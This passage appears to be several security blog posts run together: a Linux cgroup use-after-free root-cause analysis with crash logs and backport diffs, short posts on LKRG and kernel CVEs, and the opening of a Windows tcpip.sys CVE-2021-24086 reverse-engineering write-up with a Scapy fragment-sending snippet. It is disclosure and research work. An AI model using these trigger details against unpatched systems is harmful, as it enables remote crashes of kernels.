and later:

/*
 * There's a theoretical window where the following accessors race with
 * updaters and return part of the previous pointer as the prioidx or
 * classid.  Such races are short-lived and the result isn't critical.
 */

This means that sock_cgroup_data “carries” the information whether net_prio or net_cls starts being used and in such case sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer. In our crash we can extract this information:

crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

Described socket keeps the “sk_cgrp_data” pointer with the information of being “attached” to the cgroup2. However, cgroup2 has been destroyed.
Now we have all the information to solve the mystery of this bug:

  1. Process creates a socket and both of them are inside some cgroup v2 (non-root)
    • cgroup BPF is cgroup2 only
  2. At some point net_prio or net_cls is being used:
    • this operation is disabling cgroup2 socket matching
    • now, all related sockets should be converted to use net_prio, and sk_cgrp_data should be updated
  3. The socket is cloned, but not the reference to the cgroup (ref: point 1)
    • this essentially moves the socket to the new cgroup
  4. All tasks in the old cgroup (ref: point 1) must die and when this happens, this cgroup dies as well
  5. When original process is starting to “use” the socket, it might attempt to access cgroup which is already “dead”. This essentially generates Use-After-Free condition
    • in my specific case, process was killed or invoked exit()
    • during the execution of do_exit() function, all file descriptors and all sockets are being closed
    • one of the socket still points to the previously destroyed cgroup2 BPF (OpenSSH might install BPF)
    • __cgroup_bpf_run_filter_skb runs attached BPF and we have Use-After-Free

To confirm that scenario, I’ve modified some of the Linux kernel sources:

  1. Function cgroup_sk_alloc_disable():
    • I’ve added dump_stack();
  2. Function cgroup_bpf_release():
    • I’ve moved mutex to guard code responsible for walking through the cgroup hierarchy

I’ve managed to reproduce this bug again and this is what I can see in the logs:

...
[   72.061197] kmem.limit_in_bytes is deprecated and will be removed. Please report your usecase to [email protected] if you depend on this functionality.
[   72.121572] cgroup: cgroup: disabling cgroup2 socket matching due to net_prio or net_cls activation
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[   72.121574] CPU: 0 PID: 6958 Comm: kubelet Kdump: loaded Not tainted 5.7.0-g6 #32
[   72.121574] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[   72.121575] Call Trace:
[   72.121580]  dump_stack+0x50/0x70
[   72.121582]  cgroup_sk_alloc_disable.cold+0x11/0x25
                ^^^^^^^^^^^^^^^^^^^^^^^
[   72.121584]  net_prio_attach+0x22/0xa0
                ^^^^^^^^^^^^^^^
[   72.121586]  cgroup_migrate_execute+0x371/0x430
[   72.121587]  cgroup_attach_task+0x132/0x1f0
[   72.121588]  __cgroup1_procs_write.constprop.0+0xff/0x140
                ^^^^^^^^^^^^^^^^^^^^^^
[   72.121590]  kernfs_fop_write+0xc9/0x1a0
[   72.121592]  vfs_write+0xb1/0x1a0
[   72.121593]  ksys_write+0x5a/0xd0
[   72.121595]  do_syscall_64+0x47/0x190
[   72.121596]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   72.121598] RIP: 0033:0x48abdb
[   72.121599] Code: ff e9 69 ff ff ff cc cc cc cc cc cc cc cc cc e8 7b 68 fb ff 48 8b 7c 24 10 48 8b 74 24 18 48 8b 54 24 20 48 8b 44 24 08 0f 05 <48> 3d 01 f0 ff ff 76 20 48 c7 44 24 28 ff ff ff ff 48 c7 44 24 30
[   72.121600] RSP: 002b:000000c00110f778 EFLAGS: 00000212 ORIG_RAX: 0000000000000001
[   72.121601] RAX: ffffffffffffffda RBX: 000000c000060000 RCX: 000000000048abdb
[   72.121601] RDX: 0000000000000004 RSI: 000000c00110f930 RDI: 000000000000001e
[   72.121601] RBP: 000000c00110f7c8 R08: 000000c00110f901 R09: 0000000000000004
[   72.121602] R10: 000000c0011a39a0 R11: 0000000000000212 R12: 000000000000019b
[   72.121602] R13: 000000000000019a R14: 0000000000000200 R15: 0000000000000000

As we can see, net_prio is being activated and cgroup2 socket matching is being disabled. Next:

[  287.497527] percpu ref (cgroup_bpf_release_fn) <= 0 (-79) after switching to atomic
[  287.497535] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x11f/0x12a
[  287.497536] Modules linked in:
[  287.497537] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Not tainted 5.7.0-g6 #32
[  287.497538] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.497539] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x11f/0x12a

cgroup_bpf_release_fn is being executed multiple times. All cgroup BPF entries has been deleted and freed. Next:

[  287.543976] general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] PREEMPT SMP PTI
[  287.544062] CPU: 0 PID: 11398 Comm: realpath Kdump: loaded Tainted: G        W         5.7.0-g6 #32
[  287.544133] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.544217] RIP: 0010:__cgroup_bpf_run_filter_skb+0xd4/0x230
[  287.544267] Code: 00 48 01 c8 48 89 43 50 41 83 ff 01 0f 84 c2 00 00 00 e8 6f 55 f1 ff e8 5a 3e f5 ff 44 89 fa 48 8d 84 d5 e0 03 00 00 48 8b 00 <48> 8b 78 10 4c 8d 78 10 48 85 ff 0f 84 29 01 00 00 bd 01 00 00 00
[  287.544398] RSP: 0018:ffff957740003af8 EFLAGS: 00010206
[  287.544446] RAX: 6b6b6b6b6b6b6b6b RBX: ffff8911f339cf00 RCX: 0000000000000028
[  287.544506] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000001
[  287.544566] RBP: ffff8911e2eb5000 R08: 0000000000000000 R09: 0000000000000001
[  287.544625] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000014
[  287.544685] R13: 0000000000000014 R14: 0000000000000000 R15: 0000000000000000
[  287.544753] FS:  00007f86e885a580(0000) GS:ffff8911f6e00000(0000) knlGS:0000000000000000
[  287.544833] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  287.544919] CR2: 000055fb75e86da4 CR3: 0000000221316003 CR4: 00000000003606f0
[  287.544996] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  287.545063] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  287.545129] Call Trace:
[  287.545167]  <IRQ>
[  287.545204]  sk_filter_trim_cap+0x10c/0x250
[  287.545253]  ? nf_ct_deliver_cached_events+0xb6/0x120
[  287.545308]  ? tcp_v4_inbound_md5_hash+0x47/0x160
[  287.545359]  tcp_v4_rcv+0xb49/0xda0
[  287.545404]  ? nf_hook_slow+0x3a/0xa0
[  287.545449]  ip_protocol_deliver_rcu+0x26/0x1d0
[  287.545500]  ip_local_deliver_finish+0x50/0x60
[  287.545550]  ip_sublist_rcv_finish+0x38/0x50
[  287.545599]  ip_sublist_rcv+0x16d/0x200
[  287.545645]  ? ip_rcv_finish_core.constprop.0+0x470/0x470
[  287.545701]  ip_list_rcv+0xf1/0x115
[  287.545746]  __netif_receive_skb_list_core+0x249/0x270
[  287.545801]  netif_receive_skb_list_internal+0x19f/0x2c0
[  287.545856]  napi_complete_done+0x8e/0x130
[  287.545905]  e1000_clean+0x27e/0x600
[  287.545951]  ? security_cred_free+0x37/0x50
[  287.545999]  net_rx_action+0x133/0x3b0
[  287.546045]  __do_softirq+0xfc/0x331
[  287.546091]  irq_exit+0x92/0x110
[  287.546133]  do_IRQ+0x6d/0x120
[  287.546175]  common_interrupt+0xf/0xf
[  287.546219]  </IRQ>
[  287.546255] RIP: 0010:__x64_sys_exit_group+0x4/0x10

We have our crash referencing freed memory. 

First CVE – CVE-2020-14356:

I’ve decided to report this issue to the Linux Kernel security mailing list around the mid-July (2020). Roman Gushchin replied to my report and suggested to verify if I can still repro this issue when commit ad0f75e5f57c (“cgroup: fix cgroup_sk_alloc() for sk_clone_lock()”) is applied. This commit was merged to the Linux Kernel git source tree just a few days before my report. I’ve carefully verified it and indeed it fixed the problem. However, commit ad0f75e5f57c is not fully complete and a follow-up fix 14b032b8f8fc (“cgroup: Fix sock_cgroup_data on big-endian.”) should be applied as well.


After this conversation Greg KH decided to backport Roman’s patches to the LTS kernels. In the meantime, I’ve decided to apply for CVE number (through RedHat) to track this issue:

  1. CVE-2020-14356 was allocated to track this issue
  2. For some unknown reasons, this bug was classified as NULL pointer dereference 🙂

RedHat correctly acknowledged this issue as Use-After-Free and in their own description and bugzilla they specify:

However, in CVE MITRE portal we can see a very inaccurate description:

  • “A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system.”
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14356

First, it is not NULL pointer dereference but Use-After-Free bug. Maybe it is badly classified based on that opened bug:
https://bugzilla.kernel.org/show_bug.cgi?id=208003

People have started to hit this Use-After-Free bug in the form of NULL pointer dereference “kernel panic”.

Additionally, the entire description of the bug is wrong. I’ve raised that concern to the CVE MITRE but the invalid description is still there. There is also a small Twitter discussion about that here:
https://twitter.com/Adam_pi3/status/1296212546043740160

Second CVE – CVE-2020-25220:

During analysis of this bug, I contacted Brad Spengler. When the patch for this issue was backported to LTS kernels, Brad noticed that it conflicted with his pre-existing backport, and that the upstream backport looked incorrect. I was surprised since I had reviewed the original commit for mainline kernel (5.7) and it was fine. Having this in mind, I decided to carefully review the backported patch:
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-4.14.y&id=82fd2138a5ffd7e0d4320cdb669e115ee976a26e

and it really looks incorrect. Part of the original fix is the following code:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   if (skcd->val) {
+       if (skcd->no_refcnt)
+           return;
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+       cgroup_bpf_get(sock_cgroup_ptr(skcd));
+   }
+}

However, backported patch has the following logic:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   /* Socket clone path */
+   if (skcd->val) {
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+   }
+}

There is a missing check:

+       if (skcd->no_refcnt)
+           return;

which could result in reference counter bug and in the end Use-After-Free again. It looks like the backported patch for stable kernels is still buggy.

I’ve contacted RedHat again and they started to provide correct patches for their own kernels. However, LTS kernels were still buggy. I’ve also asked to assign a separate CVE for that issue but RedHat suggested that I do it myself.

After that, I went for vacation and forgot about this issue 🙂 Recently, I’ve decided to apply for CVE to track the “bad patch” issue, and CVE-2020-25220 was allocated. It is worth to point out that someone from Huawei at some point realized that patch is wrong and LTS got a correct fix as well:

https://www.spinics.net/lists/stable/msg405099.html

What is worth to mention, grsecurity backport was never affected by the CVE-2020-25220.

Summary:

Original issue, tracked by CVE-2020-14356, affects kernels starting from 4.5+ up to 5.7.10.

  • RedHat correctly fixed all their kernels, and has proper description of the bug
  • CVE MITRE still has invalid and misleading description

Badly backported patch, tracked by CVE-2020-25220, affects kernels:

  • 4.19 until version 4.19.140 (exclusive)
  • 4.14 until version 4.14.194 (exclusive)
  • 4.9 until version 4.9.233 (exclusive)

*grsecurity kernels were never affected by the CVE-2020-25220


Best regards,
Adam ‘pi3’ Zabrocki

LKRG 0.8

Hi,

We’ve just announced a new version of LKRG 0.8!  It includes enormous amount of changes – in fact, so much that we’re not trying to document all of the changes this time (although they can be seen from the git commits), but rather focus on high-level aspects. I encourage to read full announcement here:

https://www.openwall.com/lists/announce/2020/06/25/1

Btw. Among others, we have added support for Raspberry Pi 3 & 4, better scalability, performance, and tradeoffs, the notion of profiles, new documentation, @Phoronix benchmarks, and more

Best regards,
Adam

Effectiveness of Linux Rootkit Detection Tools

I would like to draw draw attention to the following Openwall’s tweet:

Juho Junnila's Master's Thesis "Effectiveness of Linux Rootkit Detection Tools" shows our LKRG as by far the most effective kernel rootkit detector (of those tested), even though that wasn't our primary focus: https://t.co/pz0r502dK6 h/t @Adam_pi3

— Openwall (@Openwall) June 14, 2020

and the full post on LKRG’s mailing list here:

https://www.openwall.com/lists/lkrg-users/2020/06/14/5

Thanks,
Adam

CVE-2020-12826

CVE-2020-12826 is assigned to track the problem with Linux kernel which I’ve described in my previous post:

CVE MITRE described the problem pretty accurately:

A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat.

RedHat tracks this issue here:

https://bugzilla.redhat.com/show_bug.cgi?id=1822077

Debian here:

https://security-tracker.debian.org/tracker/CVE-2020-12826

Fix can be found here:

https://github.com/torvalds/linux/commit/7395ea4e65c2a00d23185a3f63ad315756ba9cef

What is interesting, the story of insufficient restriction of the exit signals might not be ended 😉

How did this pass review and get backported to stable kernels? https://t.co/WhBrqUZhrw (Hint: case of right hand not knowing what the left is doing, involving a recent security fix)

— grsecurity (@grsecurity) May 14, 2020

In short, the following patch reintroduces the same problem:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b5f2006144c6ae941726037120fa1001ddede784

Best regards,
Adam

Linux kernel bug – all kernels insufficiently restrict exit signals

I’ve recently spent some time looking at ‘exec_id’ counter. Historically, Linux kernel had 2 independent security problems related to that code: CVE-2009-1337 and CVE-2012-0056.

Until 2012, ‘self_exec_id’ field (among others) was used to enforce permissions checking restrictions for /proc/pid/{mem/maps/…} interface. However, it was done poorly and a serious security problem was reported, known as “Mempodipper” (CVE-2012-0056). Since that patch, ‘self_exec_id’ is not tracked anymore, but kernel is looking at process’ VM during the time of the open().

In 2009 Oleg Nesterov discovered that Linux kernel has an incorrect logic to reset ->exit_signal. As a result, the malicious user can bypass it if it execs the setuid application before exiting (->exit_signal won’t be reset to SIGCHLD). CVE-2009-1337 was assigned to track this issue.

The logic responsible for handling ->exit_signal has been changed a few times and the current logic is locked down since Linux kernel 3.3.5. However, it is not fully robust and it’s still possible for the malicious user to bypass it. Basically, it’s possible to send arbitrary signals to a privileged (suidroot) parent process.

I’ve summarized my analysis and posted on LKML:
https://lists.openwall.net/linux-kernel/2020/03/24/1803

and kernel-hardening mailing list:
https://www.openwall.com/lists/kernel-hardening/2020/03/25/1

Btw. Kernels 2.0.39 and 2.0.40 look secure 😉

Thanks,
Adam

Linux kernel XFRM UAF

On 28th of February, I’ve sent a short summary to lkrg-users mailing list (https://www.openwall.com/lists/lkrg-users/2020/02/28/1) regarding recent Linux kernel XFRM UAF exploit dropped by Vitaly Nikolenko. I believe it is worth reading and I’ve decided to reference it on my blog as well:

Hey,

Vitaly Nikolenko published an exploit for Linux kernel XFRM use-after-free. His tweet with more details can be found here:

centos 8 / rhel 8 / ubuntu 14.04, 16.04, 18.04 poc is uploaded https://t.co/b3IJoxMaHI. The tech report is public too https://t.co/UHsMYScN9Y pic.twitter.com/uDpjEm0ycX

— Vitaly Nikolenko (@vnik5287) February 28, 2020

Detailed description of the bug can be found here:

https://duasynt.com/pub/vnik/01-0311-2018.pdf

I’ve tested his exploit under the latest version of LKRG (from the repo) and it correctly detects and kills it:

[Fri Feb 28 10:04:24 2020] [p_lkrg] Loading LKRG…
[Fri Feb 28 10:04:24 2020] Freezing user space processes … (elapsed 0.008 seconds) done.
[Fri Feb 28 10:04:24 2020] OOM killer disabled.
[Fri Feb 28 10:04:24 2020] [p_lkrg] Verifying 21 potential UMH paths for whitelisting…
[Fri Feb 28 10:04:24 2020] [p_lkrg] 6 UMH paths were whitelisted…
[Fri Feb 28 10:04:25 2020] [p_lkrg] [kretprobe] register_kretprobe() for  failed! [err=-22]
[Fri Feb 28 10:04:25 2020] [p_lkrg] ERROR: Can't hook ovl_create_or_link function :(
[Fri Feb 28 10:04:25 2020] [p_lkrg] LKRG initialized successfully!
[Fri Feb 28 10:04:25 2020] OOM killer enabled.
[Fri Feb 28 10:04:25 2020] Restarting tasks … done.
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  Trying to kill process[lucky0 | 67342]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!

Latest LKRG detects user_namespace corruption, which in a way proofs that our namespace escape logic works. When I’ve made the same test, but reverting LKRG code base to the commit just before namespace corruption detection, LKRG is still detecting it via standard method:

[Fri Feb 28 10:34:28 2020] [p_lkrg]  process[17599 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] Trying to kill process[lucky0 | 17599]!

[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] Trying to kill process[lucky0 | 22293]!

This is an interesting case. Vitaly published just a compiled binary of his exploit (not a source code). This means that adopting his exploit to play cat-and-mouse game with LKRG is not an easy task. It is possible to reverse-engineer it and modify the exploit binary, however it’s more work.

Thanks,

Adam

Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)

Introduction

Since the beginning of my journey in computer security I have always been amazed and fascinated by true remote vulnerabilities. By true remotes, I mean bugs that are triggerable remotely without any user interaction. Not even a single click. As a result I am always on the lookout for such vulnerabilities.

On the Tuesday 13th of October 2020, Microsoft released a patch for CVE-2020-16898 which is a vulnerability affecting Windows' tcpip.sys kernel-mode driver dubbed Bad neighbor. Here is the description from Microsoft:

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly
handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain
the ability to execute code on the target server or client. To exploit this vulnerability, an attacker would have
to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement
packets.

The vulnerability really did stand out to me: remote vulnerabilities affecting TCP/IP stacks seemed extinct and being able to remotely trigger a memory corruption in the Windows kernel is very interesting for an attacker. Fascinating.

Hadn't diffed Microsoft patches in years I figured it would be a fun exercise to go through. I knew that I wouldn't be the only one working on it as those unicorns get a lot of attention from internet hackers. Indeed, my friend pi3 was so fast to diff the patch, write a PoC and write a blogpost that I didn't even have time to start, oh well :)

That is why when Microsoft blogged about another set of vulnerabilities being fixed in tcpip.sys I figured I might be able to work on those this time. Again, I knew for a fact that I wouldn't be the only one racing to write the first public PoC for CVE-2021-24086 but somehow the internet stayed silent long enough for me to complete this task which is very surprising :)

In this blogpost I will take you on my journey from zero to BSoD. From diffing the patches, reverse-engineering tcpip.sys and fighting our way through writing a PoC for CVE-2021-24086. If you came here for the code, fair enough, it is available on my github: 0vercl0k/CVE-2021-24086.

TL;DR

For the readers that want to get the scoop, CVE-2021-24086 is a NULL dereference in tcpip!Ipv6pReassembleDatagram that can be triggered remotely by sending a series of specially crafted packets. The issue happens because of the way the code treats the network buffer:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // …
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0,
                                        0,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

A fresh NetBufferList (abbreviated NBL) is allocated by NetioAllocateAndReferenceNetBufferAndNetBufferList and NetioRetreatNetBuffer allocates a Memory Descriptor List (abbreviated MDL) of uint16_t(HeaderAndOptionsLength) bytes. This integer truncation from uint32_t is important.

Once the network buffer has been allocated, NdisGetDataBuffer is called to gain access to a contiguous block of data from the fresh network buffer. This time though, HeaderAndOptionsLength is not truncated which allows an attacker to trigger a special condition in NdisGetDataBuffer to make it fail. This condition is hit when uint16_t(HeaderAndOptionsLength) != HeaderAndOptionsLength. When the function fails, it returns NULL and Ipv6pReassembleDatagram blindly trusts this pointer and does a memory write, bugchecking the machine. To pull this off, you need to trick the network stack into receiving an IPv6 fragment with a very large amount of headers. Here is what the bugchecks look like:

trigger
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists

For anybody else in for a long ride, let's get to it :)

Recon

Even though Francisco Falcon already wrote a cool blogpost discussing his work on this case, I have decided to also write up mine; I'll try to cover aspects that are less or not covered in his post like tcpip.sys internals for example.

All right, let's start by the beginning: at this point I don't know anything about tcpip.sys and I don't know anything about the bugs getting patched. Microsoft's blogpost is helpful because it gives us a bunch of clues:

  • There are three different vulnerabilities that seemed to involve fragmentation in IPv4 & IPv6,
  • Two of them are rated as Remote Code Execution which means that they cause memory corruption somehow,
  • One of them causes a DoS which means somehow it likely bugchecks the target.

According to this tweet we also learn that those flaws have been internally found by Microsoft's own @piazzt which is awesome.

Googling around also reveals a bunch more useful information due to the fact that it would seem that Microsoft privately shared with their partners PoCs via the MAPP program.

At this point I decided to focus on the DoS vulnerability (CVE-2021-2486) as a first step. I figured it might be easier to trigger and that I might be able to use the acquired knowledge for triggering it to understand better tcpip.sys and maybe work on the other ones if time and motivation allows.

The next logical step is to diff the patches to identify the fixes.

Diffing Microsoft patches in 2021

I honestly can't remember the last time I diff'd Microsoft patches. Probably Windows XP / Windows 7 time to be honest. Since then, a lot has changed though. The security updates are now cumulative, which means that packages embed every fix known to date. You can grab packages directly from the Microsoft Update Catalog which is handy. Last but not least, Windows Updates now use forward / reverse differentials; you can read this to know more about what it means.

Extracting and Diffing Windows Patches in 2020 is a great blog post that talks about how to unpack the patches off an update package and how to apply the differentials. The output of this work is basically the tcpip.sys binary before and after the update. If you don't feel like doing this yourself, I've uploaded the two binaries (as well as their respective public PDBs) that you can use to do the diffing yourself: 0vercl0k/CVE-2021-24086/binaries. Also, I have been made aware after publishing this post about the amazing winbindex website which indexes Windows binaries and lets you download them in a click. Here is the index available for tcpip.sys as an example.

Once we have the before and after binaries, a little dance with IDA and the good ol’ BinDiff yields the below:

bindiff

There aren't a whole lot of changes to look at which is nice, and focusing on Ipv6pReassembleDatagram feels right. Microsoft's workaround mentioned disabling packet reassembly (netsh int ipv6 set global reassemblylimit=0) and this function seems to be reassembling datagrams; close enough right?

After looking at it for a little time, the patched binary introduced this new interesting looking basic block:

bindiff

It ends with what looks like a comparison with the 0xffff integer and a conditional jump that either bails out or keeps going. This looks very interesting because some articles mentioned that the bug could be triggered with a packet containing a large amount of headers. Not that you should trust those types of news articles as they are usually not technically accurate and sensationalized, but there might be some truth to it. At this point, I felt pretty good about it and decided to stop diffing and start reverse-engineering. I assumed the issue would be some sort of integer overflow / truncation that would be easy to trigger based on the name of the function. We just need to send a big packet right?

Reverse-engineering tcpip.sys

This is where the real journey and the usual emotional rollercoasters when studying vulnerabilities. I initially thought I would be done with this in a few days, or a week. Oh boy, I was wrong though.

Baby steps

First thing I did was to prepare a lab environment. I installed a Windows 10 (target) and a Linux VM (attacker), set-up KDNet and kernel debugging to debug the target, installed Wireshark / Scapy (v2.4.4), created a virtual switch which the two VMs are sharing. And... finally loaded tcpip.sys in IDA. The module looked pretty big and complex at first sights - no big surprise there; it implements Windows IPv4 & IPv6 network stack after all. I started the adventure by focusing first on Ipv6pReassembleDatagram. Here is the piece of assembly code that we saw earlier in BinDiff and that looked interesting:

ida

Great, that's a start. Before going deep down the rabbit hole of reverse-engineering, I decided to try to hit the function and be able to debug it with WinDbg. As the function name suggests reassembly I wrote the following code and threw it against my target:

from scapy.all import *

pkt = Ether() / IPv6(dst = 'ff02::1') / UDP() / ('a' * 0x1000)
sendp(fragment6(pkt, 500), iface = 'eth1')

This successfully triggers the breakpoint in WinDbg; neat:

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff802`2edcdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> kc
 # Call Site
00 tcpip!Ipv6pReassembleDatagram
01 tcpip!Ipv6pReceiveFragment
02 tcpip!Ipv6pReceiveFragmentList
03 tcpip!IppReceiveHeaderBatch
04 tcpip!IppFlcReceivePacketsCore
05 tcpip!IpFlcReceivePackets
06 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
07 tcpip!FlReceiveNetBufferListChainCalloutRoutine
08 nt!KeExpandKernelStackAndCalloutInternal
09 nt!KeExpandKernelStackAndCalloutEx
0a tcpip!FlReceiveNetBufferListChain

We can even observe the fragmented packets in Wireshark which is also pretty cool:

wireshark

For those that are not familiar with packet fragmentation, it is a mechanism used to chop large packets (larger than the Maximum Transmission Unit) in smaller chunks to be able to be sent across network equipment. The receiving network stack has the burden to stitch them all together in a safe manner (winkwink).

